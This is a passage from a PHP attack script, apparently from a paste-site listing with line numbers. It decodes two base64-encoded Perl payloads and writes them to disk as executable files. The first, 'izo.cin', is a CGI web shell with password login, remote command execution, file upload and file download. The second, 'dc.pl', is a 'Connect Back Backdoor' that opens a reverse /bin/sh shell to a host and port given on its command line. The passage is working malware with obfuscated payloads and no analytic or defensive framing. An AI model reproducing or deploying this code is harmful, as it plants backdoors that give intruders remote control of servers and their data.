  4777. CXsNCgkJYWxhcm0oMCk7DQoJCXByaW50IDw8RU5EOw0KPC94bXA+DQoNCjxjb2RlPg0KQ29tbWFu
  4778.  
  4779. ZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25k
  4780.  
  4781. KHMpLg0KPGJyPktpbGxlZCBpdCENCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsN
  4782.  
  4783. CgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0t
  4784.  
  4785. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4786.  
  4787. LS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQg
  4788.  
  4789. ZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2Vy
  4790.  
  4791. IHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFu
  4792.  
  4793. ZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5
  4794.  
  4795. IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRp
  4796.  
  4797. bWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hh
  4798.  
  4799. bmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRo
  4800.  
  4801. ZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0t
  4802.  
  4803. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4804.  
  4805. LS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9e
  4806.  
  4807. XHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBj
  4808.  
  4809. aGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNv
  4810.  
  4811. bW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJ
  4812.  
  4813. JENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4k
  4814.  
  4815. Q21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VI
  4816.  
  4817. ZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxA
  4818.  
  4819. JFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZCI7
  4820.  
  4821. DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsN
  4822.  
  4823. CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
  4824.  
  4825. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQg
  4826.  
  4827. IiRQcm9tcHQgJFJ1bkNvbW1hbmQ8eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnRE
  4828.  
  4829. aXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJ
  4830.  
  4831. ew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5k
  4832.  
  4833. VGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBv
  4834.  
  4835. dXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAi
  4836.  
  4837. IHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFu
  4838.  
  4839. ZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRf
  4840.  
  4841. XG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29t
  4842.  
  4843. bWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdp
  4844.  
  4845. bk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlBy
  4846.  
  4847. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0t
  4848.  
  4849. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4850.  
  4851. LS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQg
  4852.  
  4853. Y29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUg
  4854.  
  4855. c3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMg
  4856.  
  4857. ZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1l
  4858.  
  4859. bnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2Fk
  4860.  
  4861. ZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4862.  
  4863. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsN
  4864.  
  4865. Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBl
  4866.  
  4867. eGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8g
  4868.  
  4869. dGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJI
  4870.  
  4871. KiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2Fk
  4872.  
  4873. JmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlW
  4874.  
  4875. PVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmlu
  4876.  
  4877. dFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KU2VuZGluZyBGaWxl
  4878.  
  4879. ICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0
  4880.  
  4881. b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KRU5E
  4882.  
  4883. DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0N
  4884.  
  4885. CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7
  4886.  
  4887. DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJlByaW50Rmls
  4888.  
  4889. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0t
  4890.  
  4891. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4892.  
  4893. LS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJv
  4894.  
  4895. bSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2Fu
  4896.  
  4897. IGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmll
  4898.  
  4899. ZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0t
  4900.  
  4901. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4902.  
  4903. LQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlm
  4904.  
  4905. KG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7
  4906.  
  4907. DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNU
  4908.  
  4909. RE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmls
  4910.  
  4911. ZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQt
  4912.  
  4913. VHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6
  4914.  
  4915. ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7
  4916.  
  4917. IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShT
  4918.  
  4919. RU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQ
  4920.  
  4921. YWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAk
  4922.  
  4923. ISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9
  4924.  
  4925. DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4926.  
  4927. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxl
  4928.  
  4929. ZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0K
  4930.  
  4931. IyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUg
  4932.  
  4933. Y2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0
  4934.  
  4935. aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlz
  4936.  
  4937. IHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4938.  
  4939. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
  4940.  
  4941. dWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBm
  4942.  
  4943. aWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9e
  4944.  
  4945. XFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBw
  4946.  
  4947. YXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0K
  4948.  
  4949. CWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFy
  4950.  
  4951. Z2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAk
  4952.  
  4953. UGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2Ug
  4954.  
  4955. aGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZp
  4956.  
  4957. bGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsN
  4958.  
  4959. CgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0t
  4960.  
  4961. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4962.  
  4963. LS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIg
  4964.  
  4965. d2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwg
  4966.  
  4967. aXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxl
  4968.  
  4969. LCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0t
  4970.  
  4971. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4972.  
  4973. LS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwg
  4974.  
  4975. cHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7
  4976.  
  4977. DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQ
  4978.  
  4979. cmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0K
  4980.  
  4981. DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiVXBsb2FkaW5nICRUcmFu
  4982.  
  4983. c2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVh
  4984.  
  4985. bGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXRO
  4986.  
  4987. YW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJh
  4988.  
  4989. bnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQx
  4990.  
  4991. Ow0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0
  4992.  
  4993. aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJ
  4994.  
  4995. aWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmlu
  4996.  
  4997. dCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgll
  4998.  
  4999. bHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRU
  5000.  
  5001. YXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJ
  5002.  
  5003. cHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsN
  5004.  
  5005. CgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXBy
  5006.  
  5007. aW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlw
  5008.  
  5009. cmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICIiOw0KCSZQcmludENvbW1h
  5010.  
  5011. bmRMaW5lSW5wdXRGb3JtOw0KDQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0t
  5012.  
  5013. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  5014.  
  5015. LS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRz
  5016.  
  5017. IHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQs
  5018.  
  5019. IGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmls
  5020.  
  5021. ZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlk
  5022.  
  5023. ZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0K
  5024.  
  5025. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  5026.  
  5027. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmls
  5028.  
  5029. ZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5z
  5030.  
  5031. ZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50Rmls
  5032.  
  5033. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkj
  5034.  
  5035. IGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJ
  5036.  
  5037. aWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5U
  5038.  
  5039. ICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJ
  5040.  
  5041. JFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2
  5042.  
  5043. ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikg
  5044.  
  5045. PX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsN
  5046.  
  5047. Cgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0K
  5048.  
  5049. CXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhh
  5050.  
  5051. dmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1Bh
  5052.  
  5053. Z2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  5054.  
  5055. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWlu
  5056.  
  5057. IFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  5058.  
  5059. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
  5060.  
  5061. CiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NS
  5062.  
  5063. SVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBh
  5064.  
  5065. c3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmls
  5066.  
  5067. ZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9
  5068.  
  5069. Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNp
  5070.  
  5071. ZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29t
  5072.  
  5073. bWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1
  5074.  
  5075. cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZElu
  5076.  
  5077. ID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJs
  5078.  
  5079. b2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJm
  5080.  
  5081. b3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMg
  5082.  
  5083. dG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24g
  5084.  
  5085. ZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZp
  5086.  
  5087. bGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3du
  5088.  
  5089. bG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9n
  5090.  
  5091. b3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==';
  5092.  
  5093.  
  5094.  
  5095. $file = fopen("izo.cin" ,"w+");
  5096.  
  5097. $write = fwrite ($file ,base64_decode($cgishellizocin));
  5098.  
  5099. fclose($file);
  5100.  
  5101. chmod("izo.cin",0755);
  5102.  
  5103. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
  5104.  
  5105. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
  5106.  
  5107. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
  5108.  
  5109. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
  5110.  
  5111. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
  5112.  
  5113. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
  5114.  
  5115. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
  5116.  
  5117. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
  5118.  
  5119. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
  5120.  
  5121. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
  5122.  
  5123. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
  5124.  
  5125. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
  5126.  
  5127. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
  5128.  
  5129. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
  5130.  
  5131. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
  5132.  
  5133. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
  5134.  
  5135. YXRhY2hlZFxuXG4iOw==';
  5136.  
  5137.  
  5138.  
  5139. $file = fopen("dc.pl" ,"w+");
  5140.  
  5141. $write = fwrite ($file ,base64_decode($netcatshell));
  5142.  
  5143. fclose($file);
  5144.  
  5145. chmod("dc.pl",0755);
  5146.  
